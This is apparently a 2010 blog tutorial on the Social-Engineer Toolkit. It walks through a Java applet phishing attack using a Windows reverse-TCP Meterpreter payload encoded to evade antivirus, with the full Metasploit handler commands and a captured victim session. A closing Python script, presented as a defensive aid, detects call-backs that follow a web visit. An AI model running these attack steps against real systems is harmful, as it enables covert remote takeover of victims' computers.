VoIP and Hacking

Social Engineering Toolkit

by admin on Jan.15, 2010, under Hacking, Linux, Sicurezza, Tools

The Social-Engineering Toolkit (SET) is a creation of David Kennedy (ReL1K) that gives pentesters a number of notable social-engineering attacks from a convenient user interface. SET's main goal is the automation of such attacks.
The Social-Engineering Toolkit can be downloaded via Subversion simply by typing:

# cd /opt/
# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

after which it can be launched:

# cd /opt/set/
# ./set

		                              ,----,
		                            ,/   .`|
		  .--.--.       ,---,.    ,`   .'  :
		 /  /    '.   ,'  .' |  ;    ;     /
		|  :  /`. / ,---.'   |.'___,/    ,'
		;  |  |--`  |   |   .'|    :     |
		|  :  ;_    :   :  |-,;    |.';  ;
		       `. :   |  ;/|`----'  |  |
		  `----.   |   :   .'    '   :  ;
		  __     ||   |  |-,    |   |  '
		 /  /`--'  /'   :  ;/|    '   :  |
		'--'.     / |   |        ;   |.'
		  `--'---'  |   :   .'    '---'
		            |   | ,'
		            `----'                   

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]         Written by David Kennedy (ReL1K)         [---]
  [---]               Version: 0.3                       [---]
  [---]      Report bugs to: KennedyD013@gmail.com       [---]
  [---]      Check out: http://social-engineer.org       [---]
  [---] Tutorial: http://offsec.com/metasploit-unleashed [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

UPDATE: Version 0.3 is almost completely rewritten with a
ton of new updates and improvements on existing code. Be
sure to review the readme/CHANGES to see a full listing
of new and exciting things. Also note that you can heavily
customize SET and additional features by turning flags on
in the config/set_config file, nano config/set_config for
additional options and customizations.

A selection menu becomes available right away.
Among the features currently available, two stand out, both related to phishing: the first is dedicated to automating the sending of e-mail messages containing malicious code to lists of addresses, the second to setting up a trap web server able to distribute an equally malicious Java applet.

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 2

Let's try to carry out an attack based on the distribution of a Java applet by a web site.

The Social-Engineer Toolkit “Web Attack” will create a
fake “professional” looking website for you with malicious
java applet code. When you entice a victim to the website
either through social-engineering, a XSS vulnerability,
E-Mail, or other options, it will prompt the user to say
“Yes” to run the applet signed by Microsoft. Once accepted
a payload will be run on the remote system and executed.

The payload can either be something you specify or
dynamically through the Metasploit framework.

A new addition is the ability to clone a website. SET will
allow you to clone a website you specify and automatically
inject the java applet attack into the website you clone.

This can be useful if you want to make a website look
similar to a company that you are doing a penetration
testing on and want the site to look and feel like their
own. It’s currently experimental. Please email any issues
to kennedyd013@gmail.com

UPDATE: You can now use email phishing with this attack,
change the WEBATTACK_EMAIL=OFF to ON in the config/set_config
file.

XTERM is no longer used and is all in one console, this allows
you to launch SET without needing multiple consoles.

Website Attack Vectors

1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.

Enter number: 1

Let's have it create the trap site automatically.

Enter your current IP Address: 192.168.1.10

We choose the payload to pair with it:

What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable              Specify a path for your own executable

Enter choice (example 1-4): 2

We encode it in an attempt to evade anti-virus checks:

Below is a list of encodings to try and bypass AV. 

Select one of the below, Shikata_Ga_Nai is typically the best.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice (enter for default): 2

Usually 1 to 4 does the trick, if you get an
error messsage, some encoders don't like
more than one. Specify 0 if you want.

twice!

How many times do you want to encode the payload: 2

We define a port on which to wait for the return connection:

Enter the PORT of the listener: 8765

go!

[-] Encoding the payload 2 times to get around pesky Anti-Virus. [-]

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[-] The Ettercap option is currently disabled. [-]
[-] Edit the set_config to turn it on if you want. [-]

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

  [--] Tested on IE6, IE7, IE8 and FireFox [--]

[*] Launching MSF Listener...
[*] Have someone connect to you on port 80...

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 490 exploits - 228 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8108 updated today (2010.01.13)

resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.10
LHOST => 192.168.1.10
resource> set LPORT 8765
LPORT => 8765
resource> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as background job.
msf exploit(handler) > [*] Started reverse handler on port 8765

[*] Starting the payload handler...

When a vulnerable client connects to the trap site and accepts the applet as trusted, the trap springs inexorably.

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.10:8765 -> 192.168.1.253:1046)

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.10:8765 -> 192.168.1.253:1046
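The session listing above shows the network pattern a defender can look for: the victim host first fetches the trap page over HTTP (port 80), and a few seconds later opens a connection back to the same server on an arbitrary high port (here 8765). The following Python script is an added illustration of that detection heuristic; it is not part of SET or of the original post. The flow records in SAMPLE_FLOWS are constructed to mirror the session above (addresses, ports and timestamps are made up), and WEB_PORTS and WINDOW_SECONDS are assumed tuning values.

```python
from datetime import datetime

# Constructed flow records (not from the original post): one connection per line,
# "ISO-timestamp src_ip:src_port -> dst_ip:dst_port". The 192.168.1.x addresses
# and port 8765 only mirror the Meterpreter session shown above.
SAMPLE_FLOWS = """\
2010-01-15T10:00:01 192.168.1.253:1042 -> 192.168.1.10:80
2010-01-15T10:00:02 192.168.1.253:1043 -> 192.168.1.10:80
2010-01-15T10:00:07 192.168.1.253:1046 -> 192.168.1.10:8765
2010-01-15T10:01:00 192.168.1.77:50012 -> 10.0.0.5:443
2010-01-15T10:05:30 192.168.1.77:50013 -> 10.0.0.5:22
2010-01-15T10:06:00 192.168.1.20:3321 -> 192.168.1.10:80
"""

WEB_PORTS = {80, 443, 8080}   # assumed: destination ports that count as "the web visit"
WINDOW_SECONDS = 60           # assumed: how soon after the visit a call-back must follow


def parse_flow(line):
    """Parse one flow line into (timestamp, src_ip, src_port, dst_ip, dst_port)."""
    ts, rest = line.split(" ", 1)
    src, dst = rest.split(" -> ")
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src_ip, int(src_port), dst_ip, int(dst_port)


def find_callbacks(flow_text, window_seconds=WINDOW_SECONDS, web_ports=WEB_PORTS):
    """Return one alert per client that opens a non-web port to a server it just browsed.

    For every (client, server) pair the time of the most recent web-port
    connection is remembered; a later connection from the same client to the
    same server on any other port within `window_seconds` raises an alert.
    """
    flows = sorted((parse_flow(l) for l in flow_text.splitlines() if l.strip()),
                   key=lambda f: f[0])
    last_web = {}   # (client, server) -> time of the last web-port connection
    alerts = []
    for ts, src, _sport, dst, dport in flows:
        pair = (src, dst)
        if dport in web_ports:
            last_web[pair] = ts
            continue
        seen = last_web.get(pair)
        if seen is None:
            continue
        delay = (ts - seen).total_seconds()
        if delay <= window_seconds:
            alerts.append({
                "client": src,
                "server": dst,
                "callback_port": dport,
                "seconds_after_visit": delay,
            })
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_FLOWS):
        print(f"{a['client']} browsed {a['server']} and connected back to port "
              f"{a['callback_port']} {a['seconds_after_visit']:.0f}s later")
```

Run against the constructed records, the script flags only 192.168.1.253, which reached 192.168.1.10:8765 five seconds after its last HTTP request to that host; the 10.0.0.5 SSH connection falls outside the window and is ignored. This is a triage signal rather than proof: legitimate sites that hand a browser off to a second port produce the same pattern, and a payload configured to call back on 80 or 443 is invisible to it, so correlate hits with endpoint evidence such as the Java security prompt and the processes spawned by the browser.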